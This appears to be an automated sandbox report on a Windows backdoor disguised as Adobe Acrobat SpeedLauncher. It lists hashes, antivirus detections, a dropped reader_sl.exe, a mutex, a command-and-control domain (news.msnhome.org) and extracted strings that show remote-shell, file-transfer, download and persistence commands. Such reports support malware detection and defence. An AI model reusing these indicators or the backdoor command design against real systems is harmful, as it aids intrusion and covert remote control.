Analysis Date: 2014-01-03 10:49:16
MD5: fab6b0b33d59f393e142000f128a9652
SHA1: 548ae86f67b89023165ce9000f88b3f7d9f0bdfe

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: d1846d4f6e59b61c85cbe19b6e516d8c sha1: e61c108e54760f4f6e2527afa4dbca153c42e756 size: 11264
Section .rdata: md5: 6356fbb46ece2cba555bbbf3db04c95d sha1: 546656aa751db6826535dff4d865a399ee6a13ff size: 3584
Section .data: md5: 38034359e0e63aa5248ce898e6f6e971 sha1: 53e178beee9cee8591dcdfac58c680ec956487df size: 2560
Section .rsrc: md5: 8fbfba501adb1c75c8a1c324872ad328 sha1: 94719d1b1a16013df1aa3fe0767cd76b9a6ca7b7 size: 1536
Timestamp: 2010-11-17 13:37:00
Version:
LegalCopyright: Copyright 1984-2008 Adobe Systems Incorporated and its licensors. All rights Copyright 1984-2008 Adobe Systems Incorporated and its licensors. All rights reserved
FileVersion: 9.0.0.332
CompanyName: Adobe Systems Incorporated
Comments:
ProductName: Adobe Acrobat
ProductVersion: 9, 0, 0, 0
FileDescription: Adobe Acrobat SpeedLauncher
OriginalFilename: AcroSpeedLaunch.exe
Packer: Microsoft Visual C++ v6.0
PEhash: 35fb281c5f462171ab2f2a96af23e2c56b514ad6
AV avira: TR/Downloader.Gen
AV clamav: Win.Trojan.Agent-65195
AV mcafee: RDN/Downloader.a!bi
AV avg: Agent2.BVRT
AV msse: Backdoor:Win32/Likseput.B

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\Reader 9.0\Esl\reader_sl.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Adobe\Reader 9.0\Esl\reader_sl.exe

Creates Mutex: GLOBAL\MSFT64
Winsock URL: http://news.msnhome.org/public.html

Network Details:

DNS: news.msnhome.org
Type: A
207.46.31.61
DNS: news.msnhome.org
Type: A
65.55.39.12
HTTP GET: http://news.msnhome.org/public.html
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; COMPUTER-XXXXXX;Trident/4.0) 00:29
Flows: TCP 192.168.1.1:1031 ➝ 207.46.31.61:80

Raw Pcap
Strings
040904b0
9, 0, 0, 0
9.0.0.332
AcroSpeedLaunch.exe
Adobe Acrobat
Adobe Acrobat SpeedLauncher
Adobe Systems Incorporated
Comments
CompanyName
Copyright 1984-2008 Adobe Systems Incorporated and its licensors. All rights Copyright 1984-2008 Adobe Systems Incorporated and its licensors. All rights reserved
FileDescription
FileVersion
LegalCopyright
OriginalFilename
ProductName
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
%-24s %s
%-26s %5d
??2@YAPAXI@Z
??3@YAXPAX@Z
Accept:*/*
_acmdln
_adjust_fdiv
Adobe Reader Speed Launcher
ADVAPI32.dll
 and the PID is %d
\Application Data\Adobe\Reader 9.0\Esl\reader_sl.exe
AttachConsole
blc-dwd
border=
Cache-Control:max-age=0
Cache-Control:no-cache
CD-ROM		
CloseHandle
CloseServiceHandle
\cmd.exe
cmd.exe
CmdPath=
Computer:
%ComSpec%
CONIN$
Content-Length: %d
_controlfp
ControlService
ControlService failed!
CopyFileA
Create failed with %d!
CreateFileA
CreateMutexA
CreatePipe
CreateProcessA
CreateProcessAsUserA
CreateProcess failed!
CreateThread
CreateToolhelp32Snapshot
CreateWindowExA
/C "%s"
__CxxFrameHandler
@.data
DefWindowProcA
DeleteFileA
DispatchMessageA
_EH_prolog
EnumServicesStatusExA
_except_handler3
ExitProcess
ExpandEnvironmentStringsA
Failed!
Failed with %d!
FileSize:	%d
Fixed		
GetComputerNameA
GetConsoleDisplayMode
GetCurrentProcess
GetDriveTypeA
GetExitCodeProcess
GetFileAttributesA
GetFileAttributes Error code: %d
GetFileSize
GetLastError
GetLocalTime
GetLogicalDrives
__getmainargs
GetMessageA
GetModuleFileNameA
GetModuleHandleA
GetStartupInfoA
GetSystemDirectoryA
GetSystemTime
GetTempFileNameA
GetTempPathA
geturl
GetUserNameA
GetUserNameExA
GetUserProfileDirectoryA
GetVersionExA
GetVolumeInformationA
GetWindowsDirectoryA
GLOBAL\MSFT64
<h1>Bad Request (Invalid Hostname)</h1>
HttpAddRequestHeadersA
HttpOpenRequestA
HttpSendRequestA
_initterm
InternetCloseHandle
InternetConnectA
InternetOpenA
InternetOpenUrlA
InternetQueryOptionA
InternetReadFile
InternetSetOptionA
Invalid		
KB968705.bat
KERNEL32.dll
list process failed!
list service failed!
lstrcatA
lstrlenA
MainWndClass
memcpy
memset
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %d.%d; %s;Trident/4.0) %02d:%02d 
Mozilla/5.0
MSVCRT.dll
OpenP failed with %d!
OpenProcess
OpenProcessToken
OpenSCManagerA
OpenSCManager failed!
OpenServiceA
OpenService failed!
OpenT failed with %d!
__p__commode
PeekNamedPipe
__p__fmode
pidrun
Pragma:no-cache
Process32First
Process32Next
Process cmd.exe exited!
Program started!
Proxy-Connection:Keep-Alive
Ramdisk		
`.rdata
ReadFile
RegCloseKey
RegCreateKeyExA
RegDeleteValueA
RegisterClassExA
RegSetValueExA
Remote		
Removeable		
%*[^/]%*[/]%*[^/]%s
%s Connected!
Secur32.dll
Service does not exist!
Service doesn't start!
Service is running already!
Service started!
Service still running!
Service stopped!
Service stop pending!
__set_app_type
SetCurrentDirectoryA
SetFileTime
SetStdHandle
__setusermatherr
SHCreateDirectoryExA
SHELL32.dll
ShellExecuteA
Shell started fail!
Shell started successfully!
Shell started,wait to terminate it.....
Sleep Time:
Software\Microsoft\Windows\CurrentVersion\Run
So long!
sprintf
sscanf
Started already,
StartServiceA
StartService failed!
Start shell first.
strcat
strchr
_strcmpi
strcpy
strlen
_strnicmp
strrchr
strstr
Syntax error!
Syntax error!	Usage:	getf/putf FileName <N>
Syntax error!	Usage:	GetUrl URL FileName
Syntax error!	Usage:	kill </p|/s> <pid|ServiceName>
Syntax error!	Usage:	list </p|/s|/d>
Syntax error!	Usage:	start </p|/s> <filename|ServiceName>
SystemTimeToFileTime
\tasks
TerminateProcess
!This program cannot be run in DOS mode.
Totally %d volumes found.
TranslateMessage
Unkown		
URLDownloadToFileA
urlmon.dll
USER32.dll
USERENV.dll
Volume on this computer:
Volume	Type		Volume Name
WaitForSingleObject
whoami
width=
WININET.dll
WriteConsoleInputA
WriteFile
_XcptFilter